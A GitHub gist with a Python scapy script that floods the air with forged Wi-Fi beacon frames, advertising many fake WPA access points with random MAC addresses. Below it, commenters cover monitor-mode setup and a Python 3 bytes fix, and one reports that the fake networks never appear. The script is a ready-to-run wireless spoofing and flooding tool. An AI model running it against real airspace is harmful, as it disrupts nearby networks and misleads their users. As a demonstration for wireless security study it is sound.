Created
January 4, 2017 11:11
-
-
Save tintinweb/04c14d1497001e55e6c10ca28f198fbe to your computer and use it in GitHub Desktop.
scapy-fakebeacon - spawn lots of fake wifi access points by injecting beacon frames with scapy (essid)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: UTF-8 -*- | |
| # | |
| # source: https://www.4armed.com/blog/forging-wifi-beacon-frames-using-scapy/ | |
| # | |
| # requires: | |
| # radiotap supported wifi nic/driver (frame injection) (works fine with Ralink RT2571W) | |
| # iwconfig $iface mode monitor | |
| # iw dev $iface set channel $channel | |
| # or | |
| # iwlist iface scan | |
| # | |
| # example: | |
| # spawn 1000 essids (0-999) | |
| # #> python fakebeacon.py $(python -c "print ' '.join(i for i in xrange(1000))") | |
| # | |
| from scapy.all import Dot11,Dot11Beacon,Dot11Elt,RadioTap,sendp,hexdump,RandMAC | |
| import sys | |
| import random | |
| import os | |
| def main(): | |
| ssids = sys.argv[2:] #Network name here | |
| iface = sys.argv[1] #Interface name here | |
| frames =[] | |
| for netSSID in ssids: | |
| print netSSID | |
| dot11 = Dot11(type=0, subtype=8, addr1='ff:ff:ff:ff:ff:ff', | |
| addr2=str(RandMAC()), addr3=str(RandMAC())) | |
| beacon = Dot11Beacon(cap='ESS+privacy') | |
| essid = Dot11Elt(ID='SSID',info=netSSID, len=len(netSSID)) | |
| rsn = Dot11Elt(ID='RSNinfo', info=( | |
| '\x01\x00' #RSN Version 1 | |
| '\x00\x0f\xac\x02' #Group Cipher Suite : 00-0f-ac TKIP | |
| '\x02\x00' #2 Pairwise Cipher Suites (next two lines) | |
| '\x00\x0f\xac\x04' #AES Cipher | |
| '\x00\x0f\xac\x02' #TKIP Cipher | |
| '\x01\x00' #1 Authentication Key Managment Suite (line below) | |
| '\x00\x0f\xac\x02' #Pre-Shared Key | |
| '\x00\x00')) #RSN Capabilities (no extra capabilities) | |
| frame = RadioTap()/dot11/beacon/essid/rsn | |
| print "SSID=%-20s %r"%(netSSID,frame) | |
| frames.append(frame) | |
| sendp(frames, iface=iface, inter=0.0100 if len(frames)<10 else 0, loop=1) | |
| if __name__=="__main__": | |
| main() |
I had the same problem. I switched to kali linux and set the wifi card to monitor mode using airmon-ng airmon-ng start wlan0. After that everything was running like a charm. dont forget wlan0 is the name of my wifi card, so you have to find the name of yours by typing iwconfig and for iface you have to use the name provided by airmon-ng for example my wlan0mon
This does not work (using python 3.8.2 and scapy 2.4.3)
You need to use bytes for the rsn value:
rsn_array = [b'\x01\x00',
b'\x00\x0f\xac\x04',
b'\x02\x00',
b'\x00\x0f\xac\x04',
b'\x00\x0f\xac\x02',
b'\x01\x00',
b'\x00\x0f\xac\x02',
b'\x00\x00']
rsn_bytes = b''.join(rsn_array)
rsn = Dot11Elt(ID='RSNinfo', info=rsn_bytes, len=len(rsn_bytes))
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
I follow this exact code, but when I scan for APs on my phone or laptop, I never see them.